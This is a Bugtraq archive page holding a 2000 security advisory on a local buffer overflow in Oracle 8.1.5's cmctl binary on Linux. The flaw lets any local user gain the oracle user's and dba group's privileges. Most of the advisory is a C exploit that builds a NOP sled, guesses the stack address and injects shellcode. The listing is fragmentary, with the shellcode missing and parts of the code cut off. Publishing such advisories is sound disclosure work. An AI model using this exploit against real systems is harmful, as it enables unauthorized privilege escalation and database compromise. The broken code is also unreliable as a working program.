Home page logo

bugtraq logo Bugtraq mailing list archives

vulnerability in Connection Manager Control binary in Oracle 8.1.5 Linux Platform.
From: Juan Manuel Pascual Escriba <pask () PLAZASITE COM>
Date: Mon, 20 Nov 2000 12:57:42 +0100

Hello Elias

        Colud you make public this advisory. Oracle people dont send an
answer in 6 days. Please cut this lines.


                  System & Security Division

   Title:     Vulnerability in cmctl in Oracle 8.1.5
    Date:     13-11-2000
Platform:     Only tested in Linux, but can be exported to others.
  Impact:     Any user gain euid=oracle & egid=dba.
  Author:     Juan Manuel Pascual (pask () plazasite com)
  Status:     Vendor Contacted. Details Below


    cmctl is a Connection Manager Control binary


    There is a buffer overflow in cmctl that can be use by local
users to obtain euid of oracle user and egid to dba. With the default
instalation oracle user owns all database files.


    Any user with local access, can gain euid= oracle an egid=dba


    Maybe a chmod -s ;-)))).


    Vendor was contacted 13/1.1 No answers were received in last
4 days.

This vulnerability was researched by:
Juan Manuel Pascual Escriba            pask () plazasite com

Exploit Code for cmctl in Oracle 8.1.5 (8i) for Linux. I tested in RH
and 6.1. Is possible to export to others platforms.

If someone exports this to Sparc please tell me.

synopsis: buffer overflow in cmctl
Impact:   any user gain euid=oracle and egid=dba.

Dedicated to cmlc guys: juaroflin, oscar, ismak, blas, blackbas and
Thanks for your patience and time.

Special Thanks to my favourite DBA. Xavi "de verdad como sois" Morales.

#include <stdio.h>
#include <stdlib.h>

#define DEFAULT_OFFSET                    1
#define DEFAULT_BUFFER_SIZE             350
#define NOP                            0x90
#define BINARY  "/usr/local/oracle8i/app/oracle/product/8.1.5/bin/cmctl
echo $pakito"

char shellcode[] =

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");

main(int argc, char *argv[]) {
  char *buff, *ptr,*name[3],environ[100],binary[120];
  long *addr_ptr, addr;
  int i;

  if (argc > 1) offset  = atoi(argv[1]);
                printf("Use ./cmctl_start Offset\n");

  buff = malloc(bsize);
  addr = get_sp() - offset;
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  for (i = 0; i < bsize/2; i++)
    buff[i] = NOP;

  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';



                " In God We trust, Others We monitor "

         Juan Manuel Pascual Escribá        Administrador de Sistemas
         PlazaSite S.A.                         c/ Tomás Bretón 32-38
         08950 Esplugues de Llobregat           (Barcelona),    SPAIN
         Ph: +34 93 3717398                       Fax: +34 93 3711968
         mob: 667591142                     Email: pask () plazasite com

  By Date           By Thread  

Current thread:
  • vulnerability in Connection Manager Control binary in Oracle 8.1.5 Linux Platform. Juan Manuel Pascual Escriba (Nov 21)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]